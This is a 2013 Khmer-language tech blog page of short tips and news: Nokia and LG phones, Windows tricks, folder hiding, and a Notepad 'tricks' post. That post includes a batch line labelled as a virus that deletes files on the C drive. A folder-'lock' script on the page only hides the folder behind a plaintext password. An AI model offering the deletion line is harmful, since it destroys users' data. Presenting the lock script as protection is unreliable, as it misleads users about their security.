Showing posts with label បច្ចេកវិទ្យា. Show all posts
Showing posts with label បច្ចេកវិទ្យា. Show all posts

Monday, July 22, 2013

thumbnail

បច្ចេកវិទ្យាថ្មី បោះពុម្ពរូបទារក ក្នុងផ្ទៃរបស់ម្ដាយ ជារូប3D

បំភ្លេចចោលនូវការឆ្លុះអេកូ រូបភាពស.ខ្មៅ ចោលទៅ ឥលូវនេះ ក្រុមហ៊ុនជប៉ុនបានបង្កើតនូវ បច្ចេកវិទ្យាថ្មីមួយសំរាប់ ឪពុកម្ដាយថ្មីដែលចង់ឃើញ រូបរាងកូនរបស់ពួកគេ ខណៈពេលដែលនៅក្នុងស្បូនម្ដាយ។
វិស្វករខាងវិទ្យាពេទ្យ បានបង្កើតនូវឧបករណ៍ FASOTEC ដែលប្រើប្រាស់បច្ចេកវិទ្យាឆ្លុះអេកូជាលក្ខណៈ 3D និងមានពណ៌ក្នុងតម្លៃប្រហែល ៥០០ដុល្លារអាមេរិក ក្នុងរូបមួយ។ តែឥលូវនេះ អ្វីដែលប្លែក និងអស្ចារ្យជាងរូបភាពពណ៌នោះ មានក្រុមហ៊ុនមួយ បានបង្កើតនូវបច្ចេកវិទ្យមួយដ៏ថ្មីស្រឡាង ដែលអាចឆ្លុះមើលរូបរាងទារក ហើយបោះពុម្ភចេញមកក្រៅ អាចឲ្យយើងប៉ះ និងស្ទាបបានមុនពេលឆ្លងទន្លេ។ ក្រុមហ៊ុនមួយនេះ បានប្រើនូវបច្ចេកវិទ្យា ការឆ្លុះមើលដោយប្រើសំលេង ហើយសាងសង់នូវរូបភាព 3D ដែលមានរូបរាងដូចទៅនឹងកូននៅក្នុងផ្ទៃបេះបិទ។
រូបទារកដែលមានប្រវែង ៩សង់ទីម៉ែត្រ មានតម្លៃប្រមាណ ១,១៦៤ដុល្លារ។ តើប្រិយមិត្តយល់យ៉ាងណាចំពោះ បច្ចេកវិទ្យាថ្មីរបស់ជប៉ុនមួយនេះ? សូមទស្សនារូបភាពខាងក្រោម៖

ប្រភពដើមពីៈ Khmerload

ចុចអានបន្ត»

Saturday, July 13, 2013

thumbnail

Nokia Lumia 1020 កាមេរ៉ា ៤១ មេ​ហ្គា​ភិ​ច​សែ​ល

ក្រុមហ៊ុន Nokia បាន​ចេញ​ទូរស័ព្ទ​ថ្មី​មួយ​ជាមួយ​នឹង​កាមេរ៉ា​ទំហំ ៤១ មេ​ហ្គា​ភិ​ច​សែ​ល ដែល​ខ្លួន​អះអាងថា អាច​កត់ត្រា “​សេចក្តី​លំអិត​ដែល​គេ​មិន​ធ្លាប់​គិត​ថា​អាច​ទៅរួច ពី​ទូរស័ព្ទ​ស្មា​ត​ហ្វូ​ន​មួយ​” ។
ក្រុមហ៊ុន​នេះ​បាន​ និយាយ​ថា អតិថិជន​នឹង​អាច​ពង្រីក​រូបភាព ឬ ហ្ស៊ូ​ម (Zoom) និង រៀបចំ​ស៊ុម​រូបថត​ខ្លួន​ឡើងវិញ ដោយ​មិន​បារម្ភ​ពី​ ការ​ប៉ះពាល់​ដល់​គុណភាព​រូបភាព​ នោះ​ទេ ។
​ក្រុមអ្នកវិភាគ​ដែល​ បាន​ធ្វើ​តេស្ត​សាកល្បង​លើ​ទូរស័ព្ទ​នេះ​បាន​ និយាយ​ថា គ្មានអ្វី​គួរ​ឲ្យ​សង្ស័យ​ នោះ​ទេ នេះ​គឺជា​កាមេរ៉ា​ស្មា​ត​ហ្វូ​ន​ល្អ​ដាច់​គេ​លើ​ទីផ្សារ ។ ប៉ុន្តែ​ពួកគេ​បន្ថែមថា នេះ​មិនអាច​ធានាបាន​ថា ទូរស័ព្ទ​នេះ​នឹង​ក្លាយជា​ទូរស័ព្ទ​លក់ដាច់​បំផុត​ នោះ​ទេ ។
ក្រុមហ៊ុន​ស្រាវជ្រាវ​ទីផ្សារ IDC ថ្មីៗ​នេះ​បាន​អនុវត្ត​ការស្ទង់មតិ​របស់​ម្ចាស់​ស្មា​ត​ហ្វូ​ន​ ក្នុង​ប្រទេស ចំនួន ២៥ ដើម្បី​កំណត់ថា​កត្តា​អ្វី​ទៅ​ដែល​នឹង​ជម្រុញ​ដល់​ការទិញ​ក្នុង​ពេលអនាគត ។ លទ្ធផល​ស្រាវជ្រាវ​បានដាក់ Resolution របស់​កាមេរ៉ា​ ស្ថិត​ក្នុង​លំដាប់​លេខ ១៥ ក្នុងចំណោម​លក្ខណៈពិសេសៗ​ចំនួន ២៣ ។ គុណភាព​សម្លេង​អូ​ឌី​យ៉ូ អាយុកាល​ថ្ម សន្តិសុខ​របស់​ទូរស័ព្ទ និង ការ​ឆែក​មើល​អ៊ី​ន​ធឺ​ណេ​ត បាន​ ស្ថិត​ក្នុង​លំដាប់​កំពូល​នៃ​ការស្ទង់មតិ​នេះ ។
លោក Francisco Jeronimo អ្នកវិភាគ​ទូរស័ព្ទដៃ​នៅ​ក្រុមហ៊ុន​ខាងលើ​បាន​ប្រាប់ BBC ថា “​មនុស្ស​ភាគច្រើន​គ្រាន់តែ​ក្រឡេកមើល​រូបថត​រប​ស់​ខ្លួន​ នៅ​លើ​ទូរស័ព្ទ ស្មា​ត​ហ្វូ​ន​ របស់​ខ្លួន ឬ​តាមរយៈ​បណ្តាញ​សង្គម​ នៅ​លើ​កុំព្យូទ័រ ហើយ​ទាក់ទង​រូបភាព​នេះ ក្រុមហ៊ុន​លក់​ទូរស័ព្ទ​ជាច្រើន​បាន​ផ្តល់នូវ​គុណភាព​ដ៏​ល្អ​រួចទៅហើយ​” ។
លោក​ បន្ត​ថា “Nokia ត្រូវ​បញ្ចុះបញ្ចូល​អតិថិជន​ថា ទូរស័ព្ទ​ថ្មី​នេះ​មាន​សមត្ថភាព​ខ្ពស់ជាង​ទូរស័ព្ទ​ដទៃ​ ក្នុង​ស្ថានភាព ដែល​មាន​ពន្លឺ​តិច បើ​មិន​ដូច្នោះ​ទេ​ពួកគេ​នឹង​បានត្រឹមតែ​កត់សម្គាល់ឃើញ​ភាពខុសគ្នា នៅពេលដែល​ពួកគេ​ហ្ស៊ូ​ម​រូបភាព​ នៅ​លើ​អេក្រង់​ដ៏​ធំ​មួយ ឬ ព្រី​ន​ចេញ​ជា​សន្លឹក​រូបថត​ប៉ុណ្ណោះ​” ។
​ក្រៅពី​កាមេរ៉ា​ទំហំ ៤១ មេ​ហ្គា​ភិ​ច​សែ​ល ទូរស័ព្ទ Lumia 1020 ដែល​មាន​តម្លៃ ៣០០ ដុល្លារ (តម្លៃ​ក្នុង​កិច្ចសន្យា​បង់​រំ​លោះ​នៅ​អាមេរិក​) នេះ មាន​កញ្ចក់​ប្រភេទ AMOLED ទំហំ ៤,៥ អ៊ី​ញ​, ប្រព័ន្ធ​ដំណើរការ Dual-Core ប្រភេទ Snapdragon ល្បឿន ១,៥ GHz, មែ​ម​ម៉ូ​រី​ក្នុង​តួ ៣២ GB, Ram ២ GB, និង​ប្រព័ន្ធ​ប្រតិបត្តិការ Windows Phone 8 ៕
ប្រភពៈ ខេមបូឌាផេក

ចុចអានបន្ត»

Wednesday, July 10, 2013

thumbnail

វីដេអូ៖ លេចរូបភាព LG G2 កាន់តែច្បាស់ជាងមុន

ខណៈពេលដែល​មនុស្សជាច្រើន​កំពុងតែចាប់អារម្មណ៍​លើក្រុមហ៊ុន Nokia ដែលគ្រោង​នឹងដាក់បង្ហាញផលិត​ផលថ្មីមានកំរិតកាមេរ៉ា​យក្សនៅសប្តាហ៍នេះ ស្រាប់តែពេលថ្មីៗនេះមានការលេចរូបភាពទូរស័ព្ទ LG G2 ដែលធ្វើអោយអតិថិជនបានងាកមកចាប់​អារម្មណ៍​ផលិតផលរបស់​ក្រុមហ៊ុន LG នេះវិញ។ តាមពាក្យចចាមអារាមបានអោយដឹងថា LG G2 នេះនឹងបំពាក់ដោយអេក្រង់ 5-2inch, CPU Quad-core 2.3GHz processor, RAM 2GB, កាមេរ៉ា 13MP និងដំណើរការដោយប្រព័ន្ធប្រតិបត្តិការ Android 4.2.2 Jelly Bean។ Smartphone ថ្មីនេះនឹងដាក់បង្ហាញនៅក្នុងព្រឹត្តិការណ៍ថ្ងៃទី៧ ខែសីហា ខាងមុខនេះ។



ប្រភពៈ Khmer-Note
ចុចអានបន្ត»

Sunday, June 30, 2013

thumbnail

របៀបផ្លាស់ប្ដូរ Windows 8 ទៅជាភាសាខ្មែរ

ក្នុងប្រព័ន្ធប្រតិបត្តិការ Windows 8 យើងក៏អាចផ្លាស់ប្ដូរទៅជាភាសាខ្មែរបានដែរ។ ដោយគ្រាន់តែលោកអ្នកអនុវត្តន៍នូវវិធីសាស្ត្រងាយៗ ដែលយើងនឹងបង្ហាញជូនតាមរយៈវីដេអូខាងក្រោម នោះលោកអ្នកនឹងទទួលបានភាសាខ្មែរនៅលើ Windows 8 របស់លោកអ្នក ដូចរូបខាងលើនេះស្រាប់។
ចុចអានបន្ត»

thumbnail

សរសេរកូដ Programming នៅលើ Online

អ្ន​ក Programmer ទាំងឡាយតែងតែប្រើប្រាស់កម្មវិធីផ្សេងៗដើម្បីយកមកសរសេរកូដ ។ ឧទាហរណ៍ៈ
- សរសេរកូដ C#, VB.NET គឺយើងយកកម្មវិធី Microsoft Visual Studio មកប្រើប្រាស់។
- សរសេរកូដ HTML, CSS, PHP គឺយើង Notepad ++ ឬ Dreamweaver មកប្រើប្រាស់ ។
ក៏ដោយសារតែកម្មវិធីទាំងអស់នោះគឺមានភាពងាយស្រួលក្នុងការសរសេរ ព្រោះផ្ដល់ជំនួយក្នុងខណៈពេលដែលយើងមិនបានចងចាំកូដទាំងអស់ និងមិនចំណាយពេលយូរក្នុងការសរសេរកូដឡើយ។

ប៉ុន្តែថ្ងៃនេះ យើងនឹងបង្ហាញលោកអ្នកនូវ គេហទំព័រមួយ គឺ http://compileonline.com ដែលអាចប្រើជំនួសកម្មវិធីខាងលើបាន ហើយមិនបាច់តំឡើងក្នុងម៉ាស៊ីនទៀតផង។

ចុចអានបន្ត»

thumbnail

យកទូរសព្ទដៃធ្វើជា Mouse (Wifi Mouse)


សម្រាប់លោកអ្នកដែលប្រើប្រាស់ទូរសព្ទដៃ Smart Phone ថ្ងៃនេះយើងនឹងបង្ហាញនូវរបៀបប្រើប្រាស់ Mouse នៅលើទូរសព្ទដៃរបស់លោកអ្នក។ មានន័យថា លោកអ្នកមិនបាច់មាន Mouse ក៏អាចប្រើកុំព្យួទ័របានដែរ ដោយយកទូរសព្ទប្រើជំនួសវិញ។


តម្រូវការៈ
  • ទូរសព្ទប្រភេទ Smart Phone (Android, iOS)
  • កុំព្យួទ័រដែលប្រើប្រាស់ Windows, MAC OSX, Ubuntu Linux
  1. ត្រូវដំឡើងកម្មវិធីមួយឈ្មោះថា WiFi Mouse  សម្រាប់ទូរសព្ទដៃ

    សូមចុចទីនេះ! (សម្រាប់ Android)

    សូមចុចទីនេះ! (សម្រាប់ iOS)
  2. ត្រូវដំឡើងកម្មវិធីមួយឈ្មោះថា MouseSever នៅលើកុំព្យួទ័រ

    សូមចុចទីនេះ! (សម្រាប់ Windows)

    សូមចុចទីនេះ! (សម្រាប់ MAC OSX)

    សូមចុចទីនេះ! (សម្រាប់ Ubuntu Linux)
សូមមើលនូវវិធីអនុវត្តខាងក្រោមៈ

ចុចអានបន្ត»

thumbnail

របៀបធ្វើឱ្យអក្សរក្រឡាប់ច្រាស់ ហើយ Post ចូលក្នុង Facebook (ʞooqǝɔɐɟ)


នេះជាគន្លិះមួយប្លែក ដែលអ្នកទាំងអស់គ្នា អាចយកសាកល្បងដើម្បីជាចំណេះដឹងថ្មី ចែកជូនមិត្តភ័ក្រនៅលើបណ្ដាញសង្គម Facebook ។ ដែលលោកអ្នកអាចសរសេរអក្សរច្រាស់ ហើយក្រឡាប់ ដើម្បីយកទៅប្រើប្រាស់នៅកន្លែងដទៃៗ ដូចជា Facebook Status ជាដើម ។

ʞooqǝɔɐɟ

  1. សូមចូលទៅកាន់គេហទំព័រមួយនេះ http://www.fliptext.org/
  2. សូមទស្សនាវីដេអូខាងក្រោម
ចុចអានបន្ត»

thumbnail

គន្លឹះ ឬ អាថ៌កំបាំងទាំង៥ ដែល Notepad អាចធ្វើបាន


Notepad ជា Application មួយដែលភ្ជាប់មកជាមួយប្រព័ន្ធប្រតិបត្តិការ Windows ស្រាប់ ។ តើលោកអ្នកដឹងទេថា Notepad អាចធ្វើអ្វីបានខ្លះ? ចម្លើយគឺ អាចធ្វើបានច្រើនណាស់ សូម្បីតែសរសេរកូដមេរោគក៏អាចធ្វើនៅលើ Notepad បានដែរ។ ចឹងថ្ងៃនេះ យើងសូមបង្ហាញលោកអ្នកនូវ គន្លិះទាំង៥ ដែល Notepad អាចធ្វើបាន ដោយរបៀបងាយៗតែប៉ុណ្ណោះ។
  1. World Trade Center Attack Trick
  2. Matrix Effect Trick
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
  1. Create Virus that Format C Drive
@Echo off

Del C:\ *.* |y

  1. Making Personal Diary

  1. Dancing Keyboard Led

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

សម្រាប់វិធីអនុវត្តនូវ ៥គន្លិះខាងលើ សូមមើលវីដេអូខាងក្រោមៈ
ចុចអានបន្ត»

thumbnail

វិធីសាស្ត្រលាក់ ឬ បង្ហាញ Folder និង File តាម Command Prompt


ដូចអត្ថបទមុនៗ យើងបានលើកយកមកបង្ហាញ ច្រើនមកហើយអំពី វិធីសាស្ត្រក្នុងការលាក់ឯកសារ ឬ Folder ។ ហើយសម្រាប់អត្ថបទមួយនេះវិញ យើងបង្ហាញនូវរបៀបលាក់ឯកសារដដែល ប៉ុន្តែយើងសរសេរនៅលើ Command Prompt វិញម្ដង ដែលបានភ្ជាប់មកជាមួយ Windows ស្រាប់។
ចុចអានបន្ត»

thumbnail

របៀប download វីដេអូពី facebook ដោយមិនមានកម្មវិធីជំនួយ

ប្រសិនបើលោកអ្នកចង់ធ្វើការ Download វីដេអូចេញពីគេហទំព័រ Facebook លោកអ្នកត្រូវមានកម្មវិធីណាមួយដើម្បី Download បានដូចជា IDM (Internet Download Manager) ជាដើម។ ក៏ប៉ុន្តែលោកអ្នកក៏អាចយកវិដេអូពី Facebook ដោយមិនបាច់ពឹងផ្អែកទៅលើកម្មវិធីទាំងនោះបានដែរ។
សូមមើលខាងក្រោមៈ

ចុចអានបន្ត»

thumbnail

បន្ថែម Copy to និង Move to ដើម្បីផ្ដល់ភាពងាយស្រួលក្នុងការប្រើប្រាស់

ជាធម្មតានៅពេលដែលធ្វើការថតចម្លង (Copy) ឯកសារ ឬ បំលាស់ទី (Move) ឯកសារនៅលើកុំព្យួទ័រគឺ ដំបូងយើងត្រូវទៅស្វែងរកទីតាំងឯកសារដែលយើងបំរុងនឹង copy ហើយទៅស្វែងរកទីតាំងដែលត្រូវ past ។ ដូច្នេះហើយយើងត្រូវចំណាយពេលវេលាយូរ ប៉ុន្តែសូមលោកអ្នកកុំបារម្មណ៍ យើងនឹងបង្ហាញនូវវិធីសាស្រ្ដដើម្បីកាត់បន្ថយពេលវេលា ហើយដោះស្រាយនូវបញ្ហាខាងលើ។
ចុចអានបន្ត»

thumbnail

វិធីសាស្ត្រលាក់ Folder មិនឱ្យអ្នកណាមើលឃើញ


នេះជាវិធីសាស្ត្រមួយទៀត ដែលខ្មែរវីដេអូអាយធី នាំមកជូនលោកអ្នក។ ដែលលោកអ្នកអាចធ្វើការលាក់ រូបរបស់ Folder និងលាក់ អក្សររបស់ Folder បានទៀតផង។
  1.  សូមបង្កើត Folder នៅទីតាំងណាមួយ
  2. ដៃម្ខាងសង្កត់ Alt ឱ្យជាប់ (កុំព្រលែងដៃ) ហើយវាយលេខ 255 ហើយព្រលែងដៃវិញ
  3. ចុចម៉ៅស្ដាំលើ Folder យក Properties => Customise ថេប => Chang Icon => ហើយទៅរក Folder ណាដែលមិនមានរូប ហើយធ្វើការ Select បន្ទាប់ចុចប៊ូតុង OK ជាការស្រេច។
សូមមើលខាងក្រោមៈ
ចុចអានបន្ត»

thumbnail

របៀបដាក់ពាក្យសម្ងាត់ទៅឱ្យ Folder

វីដេអូខាងក្រោមនេះ​ យើងនឹងបង្ហាញលោកអ្នកនូវរបៀបដាក់ពាក្យសម្ងាត់ទៅ Folder ដោយមិនបាច់ប្រើកម្មវិធីជំនួយឡើយ។ ដោយលោកអ្នកគ្រាន់តែសរសេរកូដខាងក្រោម ចូលទៅក្នុងកម្មវិធី​ Notepad ដែលមាននៅលើ Windows ស្រាប់ ហើយរក្សាទុកជា .bat តែប៉ុណ្ណោះ។

សូមមើលនូវរបៀបបង្កើត និងរបៀបប្រើប្រាស់ តាមវីដេអូខាងក្រោម។
------------------------------------------------------
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== khmervideoit goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
បញ្ជាក់ៈ ត្រង់អក្សរពណ៌ក្រហមខាងលើ ជាពាក្យសម្ងាត់សម្រាប់ដាក់ទៅឱ្យ Folder ហើយលោកអ្នកក៏អាចធ្វើការផ្លាស់ប្ដូរបានផងដែរ។


ចុចអានបន្ត»

thumbnail

របៀបផ្លាស់ប្ដូរ Google Drive ជាភាសារខ្មែរ

យើងដឹងហើយ Google ជាក្រុមហ៊ុនដ៏ធំមួយដែលផ្ដល់នូវសេវាកម្មនៅលើអ៊ីនធឺណែត ... ។ ហើយ Google ក៏បានបង្កើតនូវ Google Drive សម្រាប់ផ្ដល់ជាទំហំផ្ទុក ដល់អ្នកប្រើប្រាស់ផងដែរ ដែលមានទំហំរហូតទៅដល់ ៥ជីកាបៃឯណុះ ហើយឥតគិតថ្លៃទៀតផង។
ថ្មីៗនេះ Google បានដាក់បញ្ចូលភាសាខ្មែរ ទៅលើគេហទំព័ររបស់ខ្លួន ថ្វីត្បិតតែពុំទាន់ពេញលក្ខណៈ ១០០ភាគរយ ប៉ុន្តែវាជាមោទនភាព និងជាការលើកទឹកចិត្តដល់អ្នកដែលកំពុងធ្វើការបកប្រែផងដែរ។
ខាងក្រោមនេះ យើងនឹងបង្ហាញលោកអ្នកនូវរបៀបផ្លាស់ប្ដូរ Google Drive ទៅជាភាសាខ្មែរ តោះ!ចាប់ផ្ដើមៈ
ចុចអានបន្ត»

thumbnail

ខ្លីៗក្នុងការបង្កើតប្លក់តាម weebly

សព្វថ្ងៃមានក្រុមហ៊ុនជាច្រើនដែលផ្ដល់ជូននូវវ៉ិបសាយ ជាលក្ខណៈប្លុកដោយឥតគិតថ្លៃសម្រាប់ការ hosting ដែលគេនិយមប្រើមានដូចជាៈ WordPress, Blogspot, Webgarden, Weebly … ។
តើអ្វីទៅជា weebly? weebly ជាកម្មវិធីនៅលើអ៊ីនធឺណែតដែលអាចឱ្យយើងសាងសង់គេហទំព័រដោយមិនបាច់មានចំណេះដឹង ឬបទពិសោធន៍ផ្នែកភាសាបង្កើតវ៉ិបសាយឡើយ។ ចំពោះរបៀបប្រើប្រាស់វិញ បងប្អូនអាចលើក ចាប់ដាក់នូវអ្វីដែល weebly ផ្ដល់ Tools  មកឱ្យស្រាប់ៗ ដោយយើងមិនបាច់មានជំនាញផ្នែកបង្កើតគេហទំព័រក៏បានដែរ … ។ ចំពោះប្លុក weebly សព្វថ្ងៃមានមនុស្សជាង ៦លាននាក់ និង
មានក្រុមហ៊ុនជំនួញតូចៗជាច្រើន ដែលប្រើប្រាស់វាដើម្បីធ្វើការផ្សព្វផ្សាយនូវព័ត៌មាននៅលើអ៊ីនធឺណែត ពីព្រោះតែវាបានផ្ដល់នូវគំរូ (Template) ស្អាតៗជាច្រើន និងមានលក្ខណៈជា Dynamic ហើយនៅពេលដែលបង្កើតគឺវាពិតជាមានដំណើរលឿនជាងប្លុកដទៃៗទៀត (ចំណេញពេលក្នុងការសរសេរព័ត៌មាន)។
ចុចអានបន្ត»

thumbnail

របៀបលាក់ មិនឱ្យមើលឃើញ Drive នៅលើ Windows

វីដេអូនេះ យើងបង្ហាញលោកអ្នកនូវរបៀបលាក់ មិនឱ្យអ្នកណាមួយដឹងថា កុំព្យួទ័ររបស់លោកអ្នកមានប៉ុន្មាន drive នោះឡើយ។
លោកអ្នកមិនបាច់ប្រើប្រាស់កម្មវិធីដើម្បីធ្វើការលាក់នោះឡើយ ដោយគ្រាន់តែលោកអ្នកអនុវត្តន៍តាមវិធីសាស្ត្រងាយៗ ហើយខ្លីទៀតផង។
សូមមើលវីដេអូខាងក្រោមៈ
ចុចអានបន្ត»

thumbnail

កំពូលអ្នកសរសេរកម្មវិធីកុំព្យួទ័រទាំង៥ នៅលើពិភពលោក

អ្នកសរសេរកម្មវិធីកុំព្យួទ័រ ត្រូវបានគេស្គាល់ថាគឺ សរសេរឡើងដោយកូដ។ ប្រសិនបើយើងក្រឡេកមើលទៅអតីតកាល ប្រវត្តិសាស្រ្ដនៃអ្នកសរសេរកម្មវិធីកុំព្យួទ័រគឺយើងនឹកឃើញទៅដល់ Ada Lovelace (Ada Augusta) នាងជាស្ត្រីដំបូងគេនៅលើពិភពលោក ដែលអាចសរសេរកម្មវិធីកុំព្យួទ័របាន នាងជាសិស្សរបស់លោក Charles Babbage ។

នៅកំឡុងឆ្នាំ ១៩៧៣ លោក Dennis Richie បានភាសា "C" ឡើង ដែលជាភាសាកុំព្យួទ័រមួយ មានការនិយមចូលចិត្តបំផុត និងត្រូវបានគេប្រើប្រាស់យ៉ាងទូលំទូលាយ។
"ខ្ញុំ​គិត​ថា​អ្នក​រាល់​គ្នា​នៅ​ក្នុង​ប្រទេស​នេះ​គួរ​តែ​រៀន​ពី​របៀប​សរសេរ​កម្មវិធី​កំ​ព្យូ​ទ័​រ​មួយ​ព្រោះ​វា​បាន​បង្រៀន​អ្នក​ពី​របៀប​គិត​​" - លោក Steve Jobs 
ខាងក្រោមនេះជាឈ្មោះ កំពូលអ្នកសរសេរកម្មវិធីកុំព្យួទ័រទាំង៥ ដែលល្បីល្បាញនៅជុំវិញពិភពលោកដោយ Developing Computer Software, Developing Computer Program, និង Operating System (OS) ផងដែរ។
  1. Dennis Ritchie
    ជាអ្នកបង្កើតភាសា C ហើយបានអភិវឌ្ឍន៍ប្រព័ន្ធប្រតិបត្តិការ យូនិក (Unix Operating System)

  2. Mark Zuckerberg
    លោក Mark Zuckerberg ដែល​បាន​បង្កើត Facebook.com នៅពេល​ដែល​គាត់​មាន​អាយុ 20 ឆ្នាំ​, លោក Mark និង​មិត្ត​ភក្តិ​ក្នុង​សាកលវិទ្យាល័យ Harward របស់​លោក​បាន​ជួយ​ក្នុង​ការ​កសាង​សង្គម Facebook ឱ្យប្រសើរឡើង។ នៅ​ពេល​ដែល​ហ្វេ​ស​ប៊ុ​ក​បាន​ចាប់​ផ្តើ​ម​ វា​ត្រូវ​បាន​ប្រើ​បាន​តែ​សម្រាប់​សិស្ស Hardward  តែប៉ុណ្ណោះ។ តំបន់​ប​ណ្តា​ញ​ហ្វេ​ស​ប៊ុ​ក​ត្រូវ​បាន​សរសេរ​ជា​ចម្បង​ក្នុង C++ និង​ភាសា​សរសេរ​  PHP 

    ដំបូងឡើយគាត់​បាន​បង្កើត​កម្មវិធី​នេះឡើង ដើម្បីធ្វើការផ្ញើ​សារ​តែប៉ុណ្ណោះ ដែលគេ​ហៅ​ថា "Zucknet​" ត្រូវ​បាន​អនុញ្ញាត​ឱ្យ​ជជែក​កំសាន្ត​ជាមួយ​កុំព្យូទ័រ​ទាំងអស់​នៅក្នុងសាលា។ នៅ​ឆ្នាំ 2003 លោក Mark បាន​បង្កើត Facemash វេ​ប​សាយ​នេះ​ ដើម្បីធ្វើការប្រៀបធៀបសាកល​វិទ្យា​ល័​យ​ពីរ​ចំហៀង​ម្ខាង ទៅម្ខាងទៀត​នៃ​ការ​ប្រលង​របស់សិស្ស "Hot or Not" ។ 
    នៅ​ប៉ុន្មានឆ្នាំ​ចុង​ក្រោយ​នេះ​ លោក Mark Zuckerberg រក​ចំណូល​បាន​ច្រើន​ជាង $ 2 ពាន់​លានដុល្លារសហដ្ឋអាមេរិក។​

  3. Steve Wozniak

    លោក Steve Woz ត្រូវ​បាន​គេ​ស្គាល់​ផង​ដែរ​សម្រាប់​ការ​អភិវឌ្ឍ​របស់​ក្រុមហ៊ុន Apple និង​ក្រុមហ៊ុន Apple​-1​-2​: 

    ៤. Bill Gates
    លោក Bill Gates ត្រូវបានគេស្គាល់ថាជាស្ថាបនិក​នៃ​ក្រុមហ៊ុន Software ដ៏​ធំ​បំផុត​របស់​ពិភព​លោក​គឺ ក្រុមហ៊ុន Microsoft ហើយ​ក៏​ជា​សហ​ប្រធាន​នៃ​មូលនិធិ Gates ផងដែរ។ Bill Gates ជាបុរស​ម្នាក់​ដែល​មានលុយច្រើន​ជាងគេ​បំផុត​ក្នុង​ពិភព​លោក។ ​ បច្ចុប្បន្ន​នេះ​ក្រុមហ៊ុន Microsoft គឺ​ជា​ផ្នែក​មួយ​នៃ​ក្រុម​ហ៊ុន​ដ៏​មាន​តំលៃ​នៅ​ក្នុង​ពិភពលោក​។
     នៅ​ឆ្នាំ 2012 ក្រុមហ៊ុន Microsoft រក​បាន $ 73,72 ពាន់​លាន​ដុល្លារ​។
    Measuring programming progress by lines of code is like measuring aircraft building progress by weight" - Bill Gates

៥. Linus Torvalds
នៅ​ក្នុង​ឆ្នាំ 1991 Linus Torvalds បាន​ចេញ​ផ្សាយ​លីនុច 0,11 ដែល​ត្រូវ​បាន​សរសេរ​ក្នុង​ភាសា​សរសេរ​កម្មវិធី C​​ ។​លីនុច​គឺ​ជា​ប្រព័ន្ធ​ប្រតិបត្តិការដោយ​ឥត​គិត​ថ្លៃ​ និង​ការ​បើក​ចំហ​ប្រតិបត្តិការ​ប្រភព​បើក​ទូលាយ​មាន​ន័យ​ថា​អ្នក​អាច​ទទួល​យក​កូដ​ប្រភព​នៃ​ប្រព័ន្ធ​ប្រតិ​ប​ត្ដិ​ការ​នេះ​ដោយ​ឥត​គិត​ថ្លៃ​។

ចុចអានបន្ត»

thumbnail

ធ្វើឱ្យកុំព្យួទ័របើកដំណើរការ មានសំលេងមនុស្សនិយាយ

ជាធម្មតាពេលលោកអ្នកបើកកុំព្យួទ័រ (នៅលើ windows) តែងតែឮសម្លេងដែលភ្ជាប់មកជាមួយនឹង windows ស្រាប់ តែយើងក៏អាចផ្លាស់ប្ដូរបានដែរ។ អត្ថបទនេះយើងនឹងបង្ហាញលោកអ្នកនូវរបៀប ធ្វើឱ្យកុំព្យួទ័ររបស់យើងពេលបើកមានសម្លេងនិយាយថា Welcome to Your PC, i live with technology ។
ជាដំបូងសូមបើកកម្មវិធី Notepad រួចសរសេរកូដថាៈ
Dim speaks, speech
speaks=”Welcome to Your PC, i live with technology”
Set speech=CreateObject(“sapi.spvoice”)
speech.Speak speaks
រួចសូមរក្សាទុកដោយឈ្មោះថា Welcome.vbs កុំភ្លេចកន្ទុយ *vbs
សូមចម្លង file ខាងលើ (Welcome.vbs) យកទៅក្នុងនៅទីតាំង

សម្រាប់ windows XP

C:\Documents and Settings\All Users\Start Menu\Programs\Startup

សម្រាប់ windows7

C:\Users\ User-Name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
ចំណាំៈ ត្រង់ Welcome to Your PC, i live with technology អាចប្ដូរទៅដាក់ពាក្យអ្វីក៏បានដែរ។
សូមបើកកុំព្យួទ័រឡើងវិញ នោះបងប្អូននឹងបានឮសម្លេងមនុស្សនិយាយថា Welcome to Your PC, i live with technology 
ចុចអានបន្ត»

thumbnail

រូបមន្ដគណផលបូក (Excel 2013)

វីដេអូនេះ យើងបានដកស្រង់ចេញពី បណ្ណាល័យខ្មែរ២៤ មួយផ្នែកតូចតែប៉ុណ្ណោះដើម្បីៈ

  1. ចែករំលែក
  2. ផ្សព្វផ្សាយនូវស្នាដៃរបស់កូនខ្មែរ

រូបមន្ដនគណនាផលបូក នៅក្នុងកម្មវិធី Microsoft Excel 2013 គឺៈ
 SUM Function
SUM( number1, [number2, ... number_n] ) ឬ


SUM ( cell1:cell2, [cell3:cell4], ... )


ចុចអានបន្ត»

thumbnail

វិធីបង្ហាញពាក្យសម្ងាត់នៅលើ log in page


